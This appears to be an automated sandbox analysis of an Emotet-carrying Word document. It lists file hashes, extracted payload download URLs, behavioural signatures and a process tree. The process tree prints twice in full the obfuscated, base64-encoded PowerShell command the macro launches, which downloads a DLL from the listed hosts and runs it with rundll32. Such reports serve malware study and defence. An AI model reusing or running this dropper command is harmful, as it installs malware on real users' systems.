Analysis
-
max time kernel
49s -
max time network
39s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
20-01-2021 23:57
Behavioral task
behavioral1
Sample
emotet_e2_9005833203499e17fc8dc75a6082bd9762dc6acd404ae5dc6b0fba27fa9e1c7a_2021-01-20__235550329182._fpx.doc
Resource
win10v20201028
General
-
Target
emotet_e2_9005833203499e17fc8dc75a6082bd9762dc6acd404ae5dc6b0fba27fa9e1c7a_2021-01-20__235550329182._fpx.doc
-
Size
166KB
-
MD5
44a36d5b7b06d5c5769e6b09abbd6ac1
-
SHA1
5a87b9620511d1a4c543e47d2efc6987aee6f957
-
SHA256
9005833203499e17fc8dc75a6082bd9762dc6acd404ae5dc6b0fba27fa9e1c7a
-
SHA512
a11515c7f28ef398fd5b735d3e7875bdc59d8423b86a4925b4edbc2ce72d1b759e02d3c2aa6b621a77fbdbfa9d8e4d83b8d6a8f13319614189d741eaa78f2343
Malware Config
Extracted
http://trendmoversdubai.com/cgi-bin/B73/
http://dryaquelingrdo.com/wp-content/SI/
http://bardiastore.com/wp-admin/A1283/
http://oxycode.net/wp-admin/x/
http://fabulousstylz.net/248152296/TpI/
http://abdo-alyemeni.com/wp-admin/seG6/
http://giteslacolombiere.com/wp-admin/FV/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 192 2564 cmd.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 3736 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2172 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1100 WINWORD.EXE 1100 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3736 powershell.exe 3736 powershell.exe 3736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3736 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1100 WINWORD.EXE 1100 WINWORD.EXE 1100 WINWORD.EXE 1100 WINWORD.EXE 1100 WINWORD.EXE 1100 WINWORD.EXE 1100 WINWORD.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exepowershell.exerundll32.exedescription pid process target process PID 192 wrote to memory of 1920 192 cmd.exe msg.exe PID 192 wrote to memory of 1920 192 cmd.exe msg.exe PID 192 wrote to memory of 3736 192 cmd.exe powershell.exe PID 192 wrote to memory of 3736 192 cmd.exe powershell.exe PID 3736 wrote to memory of 1484 3736 powershell.exe rundll32.exe PID 3736 wrote to memory of 1484 3736 powershell.exe rundll32.exe PID 1484 wrote to memory of 2172 1484 rundll32.exe rundll32.exe PID 1484 wrote to memory of 2172 1484 rundll32.exe rundll32.exe PID 1484 wrote to memory of 2172 1484 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_9005833203499e17fc8dc75a6082bd9762dc6acd404ae5dc6b0fba27fa9e1c7a_2021-01-20__235550329182._fpx.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Fqbdwxh\S2gi87b\V29T.dll,AnyString3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Fqbdwxh\S2gi87b\V29T.dll,AnyString4⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Fqbdwxh\S2gi87b\V29T.dllMD5
db6b1b751143235793c97e2060753b03
SHA172c2dd8d677a9bbc86e624383d42fd0496144a5c
SHA25601e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98
SHA512b637c6554f875cdbfe67673969b39f672ce4f5b4cf3da0a79e2bf151d878d4fb5edec4759018a8e7f1e2362ee11cf4e35760ba4cf13ba738474818e8cc94c96c
-
\Users\Admin\Fqbdwxh\S2gi87b\V29T.dllMD5
db6b1b751143235793c97e2060753b03
SHA172c2dd8d677a9bbc86e624383d42fd0496144a5c
SHA25601e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98
SHA512b637c6554f875cdbfe67673969b39f672ce4f5b4cf3da0a79e2bf151d878d4fb5edec4759018a8e7f1e2362ee11cf4e35760ba4cf13ba738474818e8cc94c96c
-
memory/1100-3-0x00007FFE49870000-0x00007FFE49880000-memory.dmpFilesize
64KB
-
memory/1100-4-0x00007FFE49870000-0x00007FFE49880000-memory.dmpFilesize
64KB
-
memory/1100-5-0x00007FFE69FC0000-0x00007FFE6A5F7000-memory.dmpFilesize
6.2MB
-
memory/1100-6-0x00007FFE49870000-0x00007FFE49880000-memory.dmpFilesize
64KB
-
memory/1100-2-0x00007FFE49870000-0x00007FFE49880000-memory.dmpFilesize
64KB
-
memory/1484-15-0x0000000000000000-mapping.dmp
-
memory/1920-7-0x0000000000000000-mapping.dmp
-
memory/2172-17-0x0000000000000000-mapping.dmp
-
memory/3736-10-0x0000027D7A3A0000-0x0000027D7A3A1000-memory.dmpFilesize
4KB
-
memory/3736-13-0x0000027D7A363000-0x0000027D7A365000-memory.dmpFilesize
8KB
-
memory/3736-14-0x0000027D7A366000-0x0000027D7A368000-memory.dmpFilesize
8KB
-
memory/3736-12-0x0000027D7A360000-0x0000027D7A362000-memory.dmpFilesize
8KB
-
memory/3736-11-0x0000027D7A550000-0x0000027D7A551000-memory.dmpFilesize
4KB
-
memory/3736-9-0x00007FFE61390000-0x00007FFE61D7C000-memory.dmpFilesize
9.9MB
-
memory/3736-8-0x0000000000000000-mapping.dmp